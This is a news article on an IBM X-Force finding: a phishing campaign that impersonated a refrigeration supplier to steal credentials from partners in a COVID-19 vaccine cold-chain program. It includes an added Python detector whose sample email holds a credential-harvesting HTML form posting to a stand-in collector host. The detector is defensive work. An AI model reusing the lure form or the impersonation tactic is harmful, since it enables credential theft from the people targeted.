IBM Uncovers Hacking Effort Targeting COVID Vaccine Logistics System
IBM researchers have uncovered a large-scale hacking attempt to infiltrate the "cold chain" logistics effort for distributing the COVID-19 vaccine. The perpetrator has not been identified, but the methods are sophisticated and the scope of the attack is unusually broad. It is not known if it was successful in its goals.
IBM's "Security X-Force" found a large-scale phishing effort targeting multiple companies, agencies and other partners in the Cold Chain Equipment Optimization Platform (CCEOP) - an initiative launched by the vaccination alliance Gavi and the United Nations Children's Fund (UNICEF) in 2015. CCEOP was set up to strengthen the vaccine supply chain in the developing world by procuring refrigeration equipment en masse; more recently, it has also been involved in the effort to prepare for COVID-19 vaccine distribution. The first coronavirus vaccine approved in the West, made by Pfizer, must be kept at temperatures below -75 F during transport and storage.
The phishing emails targeted members of this alliance, and they "appeared" to originate from an executive at Chinese refrigeration supplier Haier Biomedical, which specializes in complete cold chain solutions. Each email contained a request for quotation related to the CCEOP program, along with a malicious HTML attachment that would prompt the recipient to enter their credentials. The researchers believe that the hacker's goal was to steal credentials in order to gain unauthorized access to the recipients' systems. This would give the attacker access to processes, methods and plans for transporting the COVID-19 vaccine, including government distribution infrastructure.
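The two lure properties described above, a display name borrowing a trusted supplier's identity and an HTML attachment that asks for a login, are the kind of signals a mail gateway can check before delivery. The following is an added example (not code from IBM or the article): it parses a constructed RFQ-style message and flags both signals; the supplier allow-list domain is an assumed placeholder.

```python
"""Flag RFQ-style lures that carry credential-harvesting HTML attachments."""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample message for illustration; not an artefact from the IBM report.
SAMPLE_EML = b"""From: "Procurement, Haier Biomedical" <quotes@example-lookalike.test>
To: logistics@partner.test
Subject: RFQ - CCEOP cold chain equipment
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached request for quotation.
--b1
Content-Type: text/html; name="RFQ.html"
Content-Disposition: attachment; filename="RFQ.html"

<html><body><form action="http://collector.test/login" method="post">
Sign in to view the document: <input name="email"><input type="password" name="pw">
</form></body></html>
--b1--
"""

PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
# Assumed allow-list: display-name keyword -> the domain that supplier really sends from.
EXPECTED_DOMAINS = {"haier biomedical": "haiermedical.example"}

def html_attachments(msg):
    """Yield (filename, html_text) for every attached text/html part."""
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            yield part.get_filename(), part.get_content()

def analyse(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    name, addr = parseaddr(str(msg["From"] or ""))
    domain = addr.rsplit("@", 1)[-1].lower()
    findings = []
    for org, expected in EXPECTED_DOMAINS.items():  # display name vs. real sender domain
        if org in name.lower() and domain != expected:
            findings.append(f"display name claims {org!r} but sender domain is {domain}")
    for fname, body in html_attachments(msg):  # login form embedded in an attachment
        if PASSWORD_FIELD.search(body):
            findings.append(f"HTML attachment {fname} contains a password field")
    return {"suspicious": bool(findings), "findings": findings}

if __name__ == "__main__":
    for line in analyse(SAMPLE_EML)["findings"]:
        print(line)
```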
The targets were chosen with care, including companies that make solar panels (used for powering refrigerators in developing countries), dry ice (used for cooling vaccines during transport), and IT and software companies that support pharmaceutical manufacturers and container transport companies.
"A breach within any part of this global alliance [CCEOP] could result in the exposure of numerous partner computing environments worldwide," assessed IBM X-Force. "While attribution is currently unknown, the precision targeting and nature of the specific targeted organizations potentially point to nation-state activity. Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets."
The U.S. Department of Homeland Security has sent out an alert to organizations and companies involved in the storage and transportation of the vaccine to watch for similar activity.